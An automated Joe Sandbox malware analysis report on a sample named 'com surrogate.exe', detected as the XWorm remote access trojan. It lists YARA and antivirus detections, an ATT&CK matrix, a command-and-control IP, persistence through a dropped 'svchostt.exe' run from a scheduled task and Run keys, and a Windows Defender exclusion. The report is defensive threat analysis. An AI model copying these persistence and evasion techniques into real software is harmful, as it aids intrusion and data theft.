                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\svchostt.exeQueries volume information: C:\Users\user\svchostt.exe VolumeInformation
                      Source: C:\Users\user\Desktop\com surrogate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: com surrogate.exe, 00000000.00000002.2904869847.000000001BB4D000.00000004.00000020.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2891176022.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2904869847.000000001BB7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\Desktop\com surrogate.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: com surrogate.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: com surrogate.exe PID: 1184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\svchostt.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected XWorm
                      Source: Yara matchFile source: com surrogate.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: com surrogate.exe PID: 1184, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\svchostt.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Windows Management Instrumentation                      		1
                      Scheduled Task/Job                      		12
                      Process Injection                      		111
                      Masquerading                      		OS Credential Dumping541
                      Security Software Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		21
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell                      		1
                      DLL Side-Loading                      		21
                      Registry Run Keys / Startup Folder                      		151
                      Virtualization/Sandbox Evasion                      		Security Account Manager151
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		12
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Software Packing                      		DCSync23
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575693 Sample: com surrogate.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 40 ip-api.com 2->40 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 20 other signatures 2->54 8 com surrogate.exe 15 6 2->8         started        13 svchostt.exe 2->13         started        15 svchostt.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 42 147.185.221.22, 48990, 49791, 49846 SALSGIVERUS United States 8->42 44 127.0.0.1 unknown unknown 8->44 46 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->46 38 C:\Users\user\svchostt.exe, PE32 8->38 dropped 58 Protects its processes via BreakOnTermination flag 8->58 60 Adds a directory exclusion to Windows Defender 8->60 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 22 8->24         started        26 2 other processes 8->26 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      com surrogate.exe69%VirustotalBrowse
                      com surrogate.exe82%ReversingLabsWin32.Exploit.Xworm
                      com surrogate.exe100%AviraTR/Spy.Gen
                      com surrogate.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\svchostt.exe100%AviraTR/Spy.Gen
                      C:\Users\user\svchostt.exe100%Joe Sandbox ML
                      C:\Users\user\svchostt.exe82%ReversingLabsWin32.Exploit.Xworm

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.microsoft.i0%Avira URL Cloudsafe
                      http://www.microsoft.coV0%Avira URL Cloudsafe
                      147.185.221.220%Avira URL Cloudsafe
                      http://crl.verisign.0%Avira URL Cloudsafe
                      127.0.0.10%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        147.185.221.22true
                        • Avira URL Cloud: safe
                        		unknown
                        127.0.0.1true
                        • Avira URL Cloud: safe
                        		unknown
                        http://ip-api.com/line/?fields=hostingfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.microsoft.ipowershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1839830042.000001ED4BDFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C5179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000001.00000002.1865579182.000001ED63FE2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1859144540.000001ED5BC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1968193322.00000214D4FC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2118773278.0000013190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ip-api.comcom surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2357091947.00000163381BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.coVpowershell.exe, 00000009.00000002.2155134281.00000131EFB40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.verisign.powershell.exe, 00000009.00000002.2152559804.00000131EF9A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecom surrogate.exe, 00000000.00000002.2897221401.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, com surrogate.exe, 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839830042.000001ED4BBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1908030194.00000214C4F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2013168284.0000013180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2199136137.0000016328151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2199136137.000001632837A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      208.95.112.1
                                                      		ip-api.comUnited States
                                                      		53334TUT-ASUSfalse
                                                      147.185.221.22
                                                      		unknownUnited States
                                                      		12087SALSGIVERUStrue

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1575693
                                                      Start date and time:2024-12-16 08:35:31 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 25s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:20
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:com surrogate.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@20/21@1/3
                                                      EGA Information:
                                                      • Successful, ratio: 11.1%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 105
                                                      • Number of non-executed functions: 4
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 2288 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3448 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 3616 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                                                      • Execution Graph export aborted for target svchostt.exe, PID 4136 because it is empty
                                                      • Execution Graph export aborted for target svchostt.exe, PID 4192 because it is empty
                                                      • Execution Graph export aborted for target svchostt.exe, PID 5916 because it is empty
                                                      • Execution Graph export aborted for target svchostt.exe, PID 7068 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:36:33API Interceptor74x Sleep call for process: powershell.exe modified
                                                      02:37:36API Interceptor39x Sleep call for process: com surrogate.exe modified
                                                      07:37:36Task SchedulerRun new task: svchostt path: C:\Users\user\svchostt.exe
                                                      07:37:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchostt C:\Users\user\svchostt.exe
                                                      07:37:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchostt C:\Users\user\svchostt.exe
                                                      07:37:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1jerniuiopu.exeGet hashmaliciousBlackshadesBrowse
                                                      • ip-api.com/json/
                                                      file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                      • ip-api.com/json/
                                                      gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                      • ip-api.com/json/
                                                      hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                      • ip-api.com/json/
                                                      da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                      • ip-api.com/json/
                                                      147.185.221.22Minet.exeGet hashmaliciousNjratBrowse
                                                        CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                          ozgpPwVAu1.exeGet hashmaliciousXWormBrowse
                                                            exe003.exeGet hashmaliciousXWormBrowse
                                                              OXhiMvksgM.exeGet hashmaliciousXWormBrowse
                                                                7bZWBYVNPU.exeGet hashmaliciousXWormBrowse
                                                                  BWoiYc9WwI.exeGet hashmaliciousXWormBrowse
                                                                    fjijTlM2tu.exeGet hashmaliciousXWormBrowse
                                                                      gPEbJi1xiY.exeGet hashmaliciousXWormBrowse
                                                                        dHp58IIEYz.exeGet hashmaliciousXWormBrowse

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ip-api.comjerniuiopu.exeGet hashmaliciousBlackshadesBrowse
                                                                          • 208.95.112.1
                                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                          • 208.95.112.1
                                                                          RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                          • 208.95.112.1
                                                                          7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                          • 208.95.112.1
                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                          • 208.95.112.1
                                                                          gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                          • 208.95.112.1
                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                          • 208.95.112.1
                                                                          da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                          • 208.95.112.1
                                                                          03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                          • 208.95.112.1
                                                                          Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                          • 208.95.112.1

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TUT-ASUSjerniuiopu.exeGet hashmaliciousBlackshadesBrowse
                                                                          • 208.95.112.1
                                                                          https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                                          • 162.252.214.4
                                                                          file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                          • 208.95.112.1
                                                                          RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                          • 208.95.112.1
                                                                          7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                          • 208.95.112.1
                                                                          3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                          • 208.95.112.1
                                                                          gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                          • 208.95.112.1
                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                          • 208.95.112.1
                                                                          da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                          • 208.95.112.1
                                                                          03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                          • 208.95.112.1
                                                                          SALSGIVERUSlastest.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.20
                                                                          Fast Download.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.229
                                                                          cnct.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.20
                                                                          Server1.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.17
                                                                          njSilent.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.19
                                                                          Minet.exeGet hashmaliciousNjratBrowse
                                                                          • 147.185.221.22
                                                                          Discordd.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 147.185.221.18
                                                                          Discord2.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 147.185.221.18
                                                                          Discord3.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 147.185.221.18
                                                                          Loader.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 147.185.221.20

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchostt.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\svchostt.exe
                                                                          File Type:CSV text
                                                                          Category:dropped
                                                                          Size (bytes):654
                                                                          Entropy (8bit):5.380476433908377
                                                                          Encrypted:false
                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:modified
                                                                          Size (bytes):64
                                                                          Entropy (8bit):0.34726597513537405
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlll:Nll
                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                          Malicious:false
                                                                          Preview:@...e...........................................................

                                                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\com surrogate.exe
